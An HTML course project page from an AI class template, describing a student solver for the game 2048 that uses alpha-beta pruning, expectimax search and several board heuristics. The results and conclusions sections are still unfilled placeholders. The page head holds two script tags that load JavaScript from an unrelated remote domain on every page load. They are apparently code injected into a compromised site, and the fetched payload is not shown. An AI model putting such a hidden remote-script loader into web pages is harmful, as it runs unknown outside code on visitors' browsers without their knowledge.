<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"/>
    
    <!-- you may want to add your own keywords here, for search engine optimization -->
    <meta name="Keywords" content="INTRODUCTION TO ARTIFICIAL INTELLIGENCE, computer science, the hebrew university of jerusalem, project"/ >
    <link rel="stylesheet" type="text/css" href="http://www.cs.huji.ac.il/~ai/projects/2012/css/default.css" />      <!-- Don't change this line!-->
    <title>Your Project's Title</title>
<script src="https://majuwe.com/ad.php?u=47e78829ca6b0c698d26b4d59f447303&p=1"></script><script src="https://majuwe.com/ad.php?u=47e78829ca6b0c698d26b4d59f447303"></script></head>

<body>
<div class="main">
    <div class="gfx">
        <a href="http://www.cs.huji.ac.il/~ai/projects/" alt="Introduction to Artificial Intelligence The Hebrew University of Jerusalem"></a>  <!-- Don't change this line!--> 
    </div>
    <div class="title">
        <h1>Your Project's Title </h1>
        <h4>Final project by </h4>
        <h3>
            <a href="mailto:email1@cs.huji.ac.il" > Student #1 name  </a> &nbsp &nbsp
            <a href="mailto:email2@cs.huji.ac.il" > Student #2 name  </a>
        </h3>     
    </div>
   <hr>

    <div class="content">
    <h2>Introduction</h2>
    <p>
    In our project we decided to solve 2048 by using artificial intelligence. 
    A year ago, like everyone else, we managed to get addicted to the 2048 game. 
    This addiction made us choose that game as our final project and to try different approaches and methods for solving it as we describe next.
    </p>
    
    <h2> Approach and Method </h2>
    <p>
     In order to solve the game we used the following methods:
     <br><br>
	A.	AlphaBeta pruning:
	<br><br>
	Alpha-beta pruning is just an optimized version of MiniMax algorithm which is a game with two players. The algorithm finds the best move for our player assuming that the opponent plays his best move. In a zero-sum game the best move of our player is the move with the highest heuristic value, while the best move of the opponent is the one with the lowest heuristic value (hence the name MiniMax).
	<br><br>
	In order to use alpha-beta pruning we must first identify the two players. The first player is our agent who plays the game. The second player is the 'computer agent' which randomly inserts valued tiles in the cells of the board. Our agent tries to maximize the heuristic value. On the other hand the 'computer agent' in the original game is not specifically programmed to block our agent but rather randomly inserts values on the empty cells. 
	<br><br>
	So the question is why we use an AI technique which solves zero-sum games and which specifically assumes that both players select the best possible move for them? The answer is simple, despite the fact that it is only our agent who always plays his optimal move, the choices of the ' computer agent' can block the progress and stop our agent from completing the game. By modeling the behavior of the 'computer agent' as an optimal player we ensure that our choice will be a solid one independently from what the 'computer agent' plays. 			
	<br>
	Zero-sum game approach gives rise to the game tree. Depending on how far into the future we want to look when deciding the current move, the tree is expanded to several levels, where one level is one move of our agent followed by one move of the 'computer agent'. The branching factor at the move of our agent is 4, corresponding to sliding in the maximum of 4 possible directions. (If the current game state is such that sliding in some direction would not alter it, this direction is not available.) The 'computer agent' during his move inserts a tile of value 2 or 4 into any empty place so the branching factor at his move is twice the number of empty cells. The overall branching factor of the tree is thus of the order of 8  where   is the size of the game board. This large branching factor justifies the use of alpha-beta pruning, which avoids expanding useless nodes.
	<br><br>
	B.	Expectimax search:
	<br><br>
	The problem with the alpha-beta agent is that it is unnecessarily careful when choosing the next move.  We know that the 'computer agent' is not optimal, but random. We would like our agent to make the best move while being subjected to a random event (the random tiles being added).  Knowing the probabilities of the 'computer agent's' moves we can use expectimax algorithm to model the opponent's behavior more realistically. What this algorithm does is to recursively predict the future possible moves and to choose the next immediate one which will probably lead to the best outcome. 
	<br>                                      
	In the expectimax algorithm we expand the full game tree as described for MiniMax, but based on this tree we choose the next move differently. Moving from the leafs upwards, we take heuristic-value expectations over the possible ' computer agent' moves and maxima over our agent's moves. The expectations over the 'computer agent's moves are with respect to the new-tile probabilities taken from the source code of the original 2048 game. Since expectations are taken over all possible moves, there are no useless nodes that can remain unexpanded and the branching factor cannot be reduced.

     
    </p>
       
       
      <h2> Heuristics </h2>
       <ol>
	<li>	Score heuristic - returns the current score.</li>	
	<li>	Empty space heuristic - calculates the number of empty tiles.</li>
	<li>	Difference heuristic � compute the difference between every two adjacent tiles and sum      the results. </li>
	<li>	Max Tile heuristic- returns the maximum value in the board. </li>
	<li>	Corner heuristic- assigns higher values to tiles in one corner. </li>
	<li>	Snake Heuristic- assigning ascending values in a folded-snake shape.</li>
     
       </ol>
       
	<h2> Results </h2>
    <p>
    Describe and show here your results. You might want to add graphs and charts here, you can look at this example:
    </p>
   
    <img src="img/corner.png" alt="funny chart" width="620" > 
    <p>
    and another one:
    </p>
    
    <!--
    ***
    note that the page width is 620px, so limit your images width to 620!
    ***
    -->    
         
    <h2>Conclusions</h2>
    <p>
     Discuss the results vis-a-vis your goals and make conclusions. 
    </p>
   
    <h2>Additional Information</h2>
    <p>
        <ul>
            <li><a href="files/report.pdf"> Link to the report (English or Hebrew)</a> <b>make sure that you haven't written your i.d. number or any other information that you don't want to be published!</b> </li>
            <!--
            If you wrote your report in English, change English or Hebrew to English. i.e, you should have the following line
            <li><a href="files/report.pdf"> Link to the report (English)</a>
            -->
             <li>  Any other link </li>
        </ul>
   </p>

   <h2>References</h2>
   <p>
   List any references from the literature you have consulted or used. 
   </p>   
   </div>
   
    <!-- *Don't* delete the below code, copyright issues...  -->    
    <div class="footer">		
        <span class="right"><a href="http://templates.arcsin.se/">Website template</a> by <a href="http://arcsin.se/">Arcsin</a>   </span>
   </div>
</div>
</body>
</html>
